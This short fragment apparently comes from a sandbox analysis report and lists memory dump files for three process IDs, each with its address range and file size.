memory/2356-61-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2356-64-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2356-66-0x00007FF86CC60000-0x00007FF86CD1D000-memory.dmpFilesize
756KB
-
memory/2356-62-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2356-59-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2356-60-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3604-34-0x00000000066C0000-0x00000000066D2000-memory.dmpFilesize
72KB
-
memory/3604-35-0x0000000006B10000-0x0000000006B4C000-memory.dmpFilesize
240KB
-
memory/3604-33-0x0000000005940000-0x00000000059A6000-memory.dmpFilesize
408KB
-
memory/3604-30-0x00000000058A0000-0x0000000005932000-memory.dmpFilesize
584KB
-
memory/3604-28-0x0000000005DB0000-0x0000000006356000-memory.dmpFilesize
5.6MB
-
memory/3604-26-0x0000000000750000-0x00000000007BC000-memory.dmpFilesize
432KB
-
memory/3604-25-0x00000000744BE000-0x00000000744BF000-memory.dmpFilesize
4KB
-
memory/4492-32-0x00000000744B0000-0x0000000074C61000-memory.dmpFilesize
7.7MB
-
memory/4492-31-0x00000000744B0000-0x0000000074C61000-memory.dmpFilesize
7.7MB
-
memory/4492-29-0x0000000000090000-0x00000000000B0000-memory.dmpFilesize
128KB